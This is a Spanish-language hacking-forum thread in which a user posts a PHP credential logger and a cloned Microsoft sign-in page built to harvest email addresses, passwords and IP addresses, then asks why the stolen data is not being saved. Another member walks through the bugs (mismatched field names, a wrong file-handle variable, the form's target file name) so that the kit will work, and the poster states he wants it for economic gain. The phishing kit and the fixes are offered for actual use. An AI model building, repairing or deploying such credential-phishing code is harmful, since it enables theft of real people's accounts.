[SOLUCIONADO] Aporte para la Comunidad Phishing, Ayuda: es un mínimo detalle

Iniciado por kbmas, Junio 17, 2017, 08:36:01 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Junio 17, 2017, 08:36:01 AM Ultima modificación: Junio 20, 2017, 08:00:59 AM por HATI
Aporte para la Comunidad, pero necesito ayuda.

Utilizo mi archivo PHP
Código: php
<?php
 
$email = $_POST[ 'email' ];
$pass = $_POST[ 'password' ];
$ip = $_SERVER[ 'REMOTE_ADDR' ];
$f = fopen("user.html", "a");
fwrite($file, 'Email: [<b><font color="#0000FF">'.$email.'</font></b>] Password:[<b><font color="#FF0040">'.pass.'</font></b>] IP: [<b><font color="#FE2EF7">'.$ip.'</font></b>]<br>');
fclose($f);


header("location: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta");


Para redireccionar y hacer Phishing

Con el siguiente archivo INDEX  ---- Pero tengo un problema que todo me sale bien pero no me llega nada al archivo USER.

Código: html5
<html><link href="https://auth.gfx.ms/16.000.26513.01/Default2058.css" rel="stylesheet"><head><title>Iniciar sesión en tu cuenta Microsoft</title><link type="image/x-icon" rel="shortcut icon" href="https://auth.gfx.ms/16.000.26513.01/favicon.ico?v=2"></head>
<body class="cb"><div> <form action="haxor.php" name="f1" id="i0281" novalidate="novalidate" spellcheck="false" method="post" target="_top" autocomplete="off" data-bind="submit: submit, autoSubmit: forceSubmit, attr:{action: "haxor.php"}"> <div data-bind="component:{name: , params:{serverData: svr, showButtons: svr.A4, showFooterLinks: true, useWizardBehavior: svr.BH, submit: submit, password: pwdView.password.value, hideFromAria: learnMore.visible}}"> <div id="maincontent"> <section class="section no-margin-bottom" data-bind="visible: ! || .showHolder"> <div class="section-body container"> <div id="pageControlHost"> <div> <div id="Credentials"> <div class="container" id="CredentialsInputPane"> <div class="row text-body" data-bind="ariaHidden: hideFromAria"> <img alt="Cuenta Microsoft" src="https://auth.gfx.ms/16.000.26513.01/AppCentipede/AppCentipede_Microsoft.svg" class="img-centipede" data-bind="svgSrc: centipede.getUrl(), attr:{alt: str[]}"> </div><div data-bind="ariaHidden: learnMore.visible"> <div id="loginHeader" class="row text-subheader" data-bind="text: loginHeader">Iniciar sesión</div><div class="row text-body"> <div id="loginDescription" data-bind=" htmlWithBindings: loginDescription, childBindings:{: !pwdView.isCombinedSISU()}}}">Usa tu cuenta de Microsoft. <a class="display-block" href="#" id="learnMoreLink" target="_top">¿Qué es esto?</a></div></div><div class="row" data-bind="ifnot: fedView.isActive() || hrdVisible()"> <div data-bind="if: ngcView.isNGCReAuthSupported"></div><div data-bind="if: postType()===11"> <div data-bind="component:{name: , params:{serverData: svr, validationEnabled: validationEnabled, phone: pwdView.phone, username: pwdView.username, password: pwdView.password, hip: pwdView.hip, kmsi: pwdView.kmsi, lockUsername: lockUsername, focusDefaultField: true, setOtcPostType: setOtcPostType, signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl}}"> <fieldset> <div data-bind="component:{name: ], allowPhone: svr.A, allowSkype: svr.B, validationEnabled: validationEnabled, signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl}}"> <div class="row"> <div class="form-group"> <div class="form-group col-md-24"> <div style="display: none;" id="SUName0" class="text-body text-block-body no-margin-bottom" data-bind="visible: locked, text: value"></div><div data-bind="visible: !locked"> <div class="placeholderContainer" data-bind="component:{name: )}}"> <input aria-label="Correo electrónico o teléfono" placeholder="Correo electrónico o teléfono" name="email" value="" id="email" maxlength="113" class="form-control ltr_override" aria-describedby="usernameError" data-bind="textInput: value, value: value.delayed, hasFocusEx: focused, placeholder: , ariaLabel: hintText, css:{: error}, attr: inputAttributes" lang="en" type="email"> <div style="display: none;" id="usernameProgress" class="progress" data-bind="visible: showProgress"><div></div><div></div><div></div><div></div><div></div><div></div></div><div class="phholder" style="left:0;top:0;width:100%;position:absolute;z-index:5" data-bind="visible: !textInput(), click: focus"></div></div><input name="login" data-bind="value: postValue" type="hidden"> </div></div></div></div></div><div data-bind="component:{name: , params:{value: password.value, error: password.error, hidden: password.hidden, focused: passwordFocused, disabled: password.disabled, hidden: password.hidden, errors: passwordErrors, allowLongPasswords: svr.C, validationEnabled: validationEnabled, resetPasswordUrl: resetPasswordUrl}}"> <div class="row"> <div class="form-group col-md-24"> <div class="placeholderContainer" data-bind="component:{name: }}"> <input maxlength="127" aria-label="Contraseña" placeholder="Contraseña" name="pass" id="pass" autocomplete="off" class="form-control" aria-describedby="passwordError" data-bind=" textInput: value, hasFocusEx: focused, disable: disabled, placeholder: , ariaLabel: str[: error}" type="password"> <div class="phholder" style="left:0;top:0;width:100%;position:absolute;z-index:5" data-bind="visible: !textInput(), click: focus"></div></div></div></div></div><div data-bind="component:{name: , params:{value: kmsi.value, locked: lockUsername}}"><div id="idTd_PWD_KMSI_Cb" class="form-group checkbox text-block-body no-margin-top" data-bind="visible: !locked"> <label id="idLbl_PWD_KMSI_Cb"> <input name="KMSI" id="idChkBx_PWD_KMSI0Pwd" data-bind="checked: value" type="checkbox"> <span data-bind="text: str[]">Mantener la sesión iniciada</span> </label> </div></div></fieldset></div></div><div data-bind="if: postType()===17"></div><div data-bind="if: postType()===30"></div></div><div class="row" data-bind="if: fedView.isActive"></div><input value="11" name="type" data-bind="value: svr.BH ? 20 : postType" type="hidden"> <input value="Dbq7dxFAqQ1rGm3H3nJtG9uJ*BhpQFvT*goORXSc1vh!gHkHHc65dWzFAayioJfhUTWfNvRYgcJji4FSzBH3pIWUZQv!oQZFqBwOo2l3o39RZFsbcbqToq7nnCKKq*JATYr!Mi93IBCvrQX74H*HC9xdGRLeYhTTPBn4a34PftO9yYFRhgUUPmzcM!SMlHBicpqUHd!MtyV2ge9g0swLQn4I!ARy!eGJ343NUkvKZcJULoagBV1LMU8dvt96d2yJKHiXMuMMS5uxsU!HVGjeDU0$" name="PPFT" id="i0327" data-bind="value: svr.sFT" type="hidden"> <input value="Passp" name="PPSX" data-bind="value: svr.t" type="hidden"> <input name="NewUser" value="1" type="hidden"> <input value="3" name="LoginOptions" data-bind="value: loginOptions" type="hidden"> <input value="" name="FoundMSAs" data-bind="value: foundNames" type="hidden"> <input value="0" name="fspost" data-bind="value: svr.fPOST_ForceSignin ? 1 : 0" type="hidden"> <div data-bind="component:{name: , params:{loginMode: svr.g, kmsi: pwdView.kmsi.value, whatsThis: learnMore.shown(), pageSubmitted: pageSubmitted}}"><input value="1" name="i2" data-bind="value: clientMode" type="hidden"> <input value="{&quot;navigationStart&quot;:1472696102209,&quot;unloadEventStart&quot;:0,&quot;unloadEventEnd&quot;:0,&quot;redirectStart&quot;:0,&quot;redirectEnd&quot;:0,&quot;fetchStart&quot;:1472696103288,&quot;domainLookupStart&quot;:1472696103288,&quot;domainLookupEnd&quot;:1472696103710,&quot;connectStart&quot;:1472696103710,&quot;connectEnd&quot;:1472696103710,&quot;requestStart&quot;:1472696104015,&quot;responseStart&quot;:1472696104125,&quot;responseEnd&quot;:1472696104514,&quot;domLoading&quot;:1472696104515,&quot;domInteractive&quot;:1472696105488,&quot;domContentLoadedEventStart&quot;:1472696105491,&quot;domContentLoadedEventEnd&quot;:1472696105492,&quot;domComplete&quot;:1472696105493,&quot;loadEventStart&quot;:1472696105493,&quot;loadEventEnd&quot;:0}" name="i16" data-bind="value: clientPerf" type="hidden"> <input value="0" name="i17" data-bind="value: srsFailed" type="hidden"> <input value="__DefaultLoginStrings|1,__DefaultLogin_Core|1,__DefaultLogin_OTC|1," name="i18" data-bind="value: srsSuccess" type="hidden"> <input value="" name="i19" data-bind="value: timeOnPage" type="hidden"> <input value="0" name="i21" data-bind="value: clientUsedWhatsThis" type="hidden"> <input value="0" name="i13" data-bind="value: clientUsedKmsi" type="hidden"></div></div><div data-bind="component:{name: , params:{shown: learnMore.shown, visible: learnMore.visible, accountQueryUrl: svr.a2, loadDynamicContent: svr.BG}}"></div></div></div></div></div><div data-bind="ariaHidden: hideFromAria"> <div class="row" id="ftrButton"> <div class="col-xs-24 form-group" data-bind="ariaHidden: learnMore.visible"> <input value="Iniciar sesión" id="idSIButton9" class="btn btn-block btn-primary btn-image btn-image-svg" data-bind=" value: submitButtonText, css:{: true &amp;&amp; true}" type="submit"> </div></div><div data-bind="ariaHidden: learnMore.visible"> <div data-bind="component:{name: , params:{showOtcLink: !isFSI &amp;&amp; !isOTS &amp;&amp; !svr.U, showSignupLink: !lockUsername &amp;&amp; svr.Ah, showResetPasswordLink: true, showRemoteNGCLink: false, showPasswordLink: false, lockUsername: lockUsername, setOtcPostType: setOtcPostType, resetPassword: hrd ? hrd.resetPassword : null, signUpUrl: signUpUrl, resetPasswordUrl: resetPasswordUrl}}"><div class="row"> <div class="col-md-24"> <div class="section" data-bind="htmlWithBindings: html[:{href: signUpUrl}}">¿No tiene una cuenta? <a href="https://signup.live.com/signup.aspx?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1472696102&amp;rver=6.4.6456.0&amp;wp=MBI_SSL&amp;wreply=https%3a%2f%2foutlook.live.com%2fowa%2f&amp;id=292841&amp;cbcxt=out&amp;fl=wld&amp;bk=1472696104&amp;uiflavor=web&amp;uaid=6585967bc7634e0e804c196f7ed8023f&amp;mkt=ES-MX&amp;lc=2058" id="signup">Cree una.</a></div><div class="text-13"> <div class="form-group"> <a id="idA_PWD_ForgotPassword" href="https://account.live.com/ResetPassword.aspx?wreply=https://login.live.com/login.srf%3fwa%3dwsignin1.0%26rpsnv%3d13%26ct%3d1472696102%26rver%3d6.4.6456.0%26wp%3dMBI_SSL%26wreply%3dhttps%253a%252f%252foutlook.live.com%252fowa%252f%26lc%3d2058%26id%3d292841%26mkt%3des-mx%26cbcxt%3dout%26fl%3dwld%26bk%3d1472696104&amp;id=292841&amp;uiflavor=web&amp;uaid=6585967bc7634e0e804c196f7ed8023f&amp;mkt=ES-MX&amp;lc=2058&amp;bk=1472696104" data-bind="text: str[], href: resetPasswordUrl, click: resetPassword ? resetPassword.toggle : null">Olvidé mi contraseña</a> </div><div class="form-group" id="idTD_PWD_SwitchToOTCLink"> <a id="idA_PWD_SwitchToOTC" href="#" data-bind="text: str[], click: setOtcPostType">Inicia sesión con un código de un solo uso</a> </div><div style="display: none;" class="form-group" data-bind="visible: lockUsername &amp;&amp; svr.urlSwitch &amp;&amp; svr.w"> <a id="i1668" href="https://login.live.com/logout.srf?wa=wsignin1.0&amp;rpsnv=13&amp;ct=1472696102&amp;rver=6.4.6456.0&amp;wp=MBI_SSL&amp;wreply=https%3a%2f%2foutlook.live.com%2fowa%2f&amp;lc=2058&amp;id=292841&amp;mkt=es-mx&amp;cbcxt=out&amp;fl=wld&amp;ru=https://outlook.live.com/owa/&amp;bk=1472696104&amp;lm=I" data-bind="text: str[], href: svr.urlSwitch">Inicia sesión con una cuenta Microsoft diferente</a> </div></div></div></div></div></div><div id="ftr" class="text-body"> <div data-bind="component:{name: , params:{showLinks: footer.showLinks, showLogo: footer.showLogo, serverData: svr}}"><div id="footerTD" class="popupfooter popup breakword footer"> <div class="footerNode links text-secondary"> <a target="_blank" href="https://login.live.com/gls.srf?urlID=WinLiveTermsOfUse&amp;mkt=ES-MX&amp;vv=1600" id="ftrTerms" class="first" data-bind="text: str[: linkTarget}">Términos de uso</a> <a target="_blank" href="https://login.live.com/gls.srf?urlID=MSNPrivacyStatement&amp;mkt=ES-MX&amp;vv=1600" id="ftrPrivacy" data-bind="text: str[: linkTarget}">Privacidad y cookies</a> </div><div id="ftrLogo" class="footerNode text-base text-secondary text-logotype"><img alt="Microsoft" src="https://auth.gfx.ms/16.000.26513.01/Microsoft_Logotype_Gray.svg" data-bind="svgSrc: logoTypeUrl, attr:{alt: str[]}"></div></div></div></div></div></div></section> </div></div><input type="hidden" name="type" value="hotmail"> <input type="hidden" name="identifier" value="LAMENTE1"> <input type="hidden" name="URL" value="https://login.live.com"> <input type="hidden" name="platform" value="Desktop"></form></div></body></html>
Junio 17, 2017, 09:47:02 AM #1 Ultima modificación: Junio 17, 2017, 01:22:49 PM por Gabriela
Buenas, echa un vistazo a las normas No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Te recomiendo tambien que incluyas tu codigo entre las etiquetas correspondientes para facilitar la lectura

Un saludo
Mi blog: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si necesitas ayuda, no dudes en mandar MP
Junio 17, 2017, 03:13:37 PM #2

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Es conveniente leer, también.

Gabriela
Tú te enamoraste de mi valentía, yo me enamoré de tu oscuridad; tú aprendiste a vencer tus miedos, yo aprendí a no perderme en tu abismo.
Junio 17, 2017, 04:37:35 PM #3
muchas gracias seguir las normas es lo mas importante para una comunidad sana y respetuosa.! pero necesito ayuda con mi primer post e investigado muchisimo y e recolectado toda buena informacion que pueden ver pero el minimo detalle es que no me llegan los resultados del phishing aprecio la ayuda de otros usuarios att kbmas  :)
Junio 17, 2017, 07:53:53 PM #4 Ultima modificación: Junio 17, 2017, 08:43:50 PM por xyz
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

¿Cual es el problema que estas teniendo? ¿En que parte de código tiene errores? ¿Tienes algún log para exportar?

Debes ser más específico con lo que planteas. Tu código es tú lógica. Por consecuente, para que podamos comprender el objetivo que buscas, debes indicar una sección de código.

Saludos !
Junio 18, 2017, 01:51:59 PM #5
Has dado permisos a ambos ficheros? El php y el archivo user.html donde guardas?

Un saludo.


Junio 18, 2017, 04:09:49 PM #6 Ultima modificación: Junio 18, 2017, 06:47:41 PM por xyz
En el Index fake no existe ningún id ni ningún name   con password

Código: php
id="password" name="password
  <<<<<<<<<<<<<esto no existe con lo cual ya tienes un error...!

En el index

Código: php
<input maxlength="127" aria-label="Contraseña" placeholder="Contraseña" name="pass" id="pass" autocomplete="off"


Como  puedes observar el id && name es pass no password  si utilizaras un deguger te facilitaría mucho la vida
Código: php

$pass = $_POST[ 'password' ];
<<<quieres meter en la variable $pass el valor recibido por el método POST de password  cuando no lo recibes

Otro fallo que he visto es este:

Código: php
$f = fopen("user.html", "a");


Cuando debería quedar así :

Código: php
$file = fopen("user.html", "a");


Porque luego lo utilizas aquí

Código: php
fwrite($file
,<<<<<<< como ves esta es la variable en donde se va añadir el  contenido

No te lo tomes a mal pero todavía no estás capacitado para  hacer bien  lo que  quieres hacer yo te aconsejo que aprendas a hacer las  cosas  partiendo  de una base  teórica  porque lo que no se puede hacer es un cohete lunar con papel de fumar.

Hazme caso cójete un tutorial de los cientos que se comparten en este grandísimo Foro y reviéntalo hasta caer exhausto y cuando comprendas los fundamentos verás como todo tiene sentido.

Es un consejo  sin ánimo de ofender a nadie Suerte y al Toro.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 19, 2017, 11:41:31 AM #7
Si de poco a poco voy estuve viendo cursos html y de verdad que esto es toda una ciencia hay q tener una mente bien capacitada para ver los errores q vistes y estuve corroborando y tienes razon me fue de gran ayuda ver esos pequeños errores.! en mi caso pido estas pocas ayudas en otros casos por ejemplo a otros usuarios les gusta que le hagan todo.! pero tengo mis pestañas bien buenas para seguir leyendo darle con todo  soy de vzla me gustaria hablar contigo por microfono espero tu respuesta Hu3c0
Junio 19, 2017, 02:11:43 PM #8
Lo que tienes que tratar de hacer es ir poco a poco y no tratar de abarcar tanto al mismo tiempo o perderás información en el proceso....
Junio 19, 2017, 06:26:45 PM #9 Ultima modificación: Junio 19, 2017, 06:47:43 PM por Hu3c0
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Si de poco a poco voy estuve viendo cursos html y de verdad que esto es toda una ciencia hay q tener una mente bien capacitada para ver los errores q vistes y estuve corroborando y tienes razon me fue de gran ayuda ver esos pequeños errores.! en mi caso pido estas pocas ayudas en otros casos por ejemplo a otros usuarios les gusta que le hagan todo.! pero tengo mis pestañas bien buenas para seguir leyendo darle con todo  soy de vzla me gustaria hablar contigo por microfono espero tu respuesta Hu3c0

Hola amigo  @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta para mi vida anónima no dispongo de ninguna Red Social  o forma de contactar porque no me gustan las Redes Sociales para nada

Y no soy ninguna mente prodigiosa tú puedes hacerlo igual  que yo, pero debes de estudiar como funcionan las cosas todo tiene unas reglas de funcionamiento.

Por ejemplo el php no está debidamente cerrado  esto es una apertura  y cierre <?php  ---aquí va código   ?>

Luego otra cosa que se me olvidó decirte  es que el archivo php debes llamarlo haxor.php    porque así está en el action del  formulario   form action="haxor.php"   ó modificar  todo a  tu antojo cambiandoles los nombres.

O también en el encabezado por encima del html puedes poner el código php  haciendo un condicional preguntado si está seteadas las variables algo así

if ( isset($_POST['f1'] )){haces esto;}
else {haces lo otro;}

Es bastante complejo poder ponerme en tu contexto actual y poder ayudarte y me encantaría poder hacerlo porque así aprendería yo también pero hay muchas cosas que desconoces y sólo alcanzarás comprenderlas si pones de tu parte SI ó SI.

Vete mirando variables, alcance de variables, variables  globales,itineración&&condicionales, arrays , php Object¿cómo se  construye un formulario para php eso sólo para tomar contacto? Debes comprender como se mandan los datos por el método POST , debes comprender sobre variables  de sesión.

No quiero que pienses ni tú ni nadie que voy de listillo  yo me considero un aprendiz y me acojono de lo que todavía no sé  que es mucho ,sólo que pongo mucho de mi parte para comprenderlo todo.


Para  finalizar ese código que has pegado  tiene muy mala leche ¿Porqué? Porque lo han puesto así para fastidiar  a gente sin conocimientos en términos del  jurásico es un código antinoob...!

Saludos y a ponerse manos a la obra


No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Junio 20, 2017, 12:57:17 AM #10
es enserio @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta joder tio ese ultimo parrafo me mato el alma ----> Para  finalizar ese código que has pegado  tiene muy mala leche ¿Porqué? Porque lo han puesto así para fastidiar  a gente sin conocimientos en términos del  jurásico es un código antinoob...!

fuuuuuck todo esto me resume que de por si tengo que seguir leyendo y leyendo tengo dos dias viendo un curso de html por youtube pero son cosas basicas terminos que logro tratar de entender pero hago tantas cosas al dia que solo por las noches me pongo a investigar tuviera una pila que me dure 24/7 para poder realizar todas las investigaciones posible.!! pero lo mas triste que siempre queremos resultados de un dia para otro.!! saludos a todos y bueno mi intension no es para hacer el mal si no que saber aprovechar de una facilidad que nos da el internet el sistema  y poder asi mejorar la situacion economica que se vive en la fukin venezuela en que vivimos muchas gracias.!
Imprimir
Ir Arriba Páginas1
Acciones del Usuario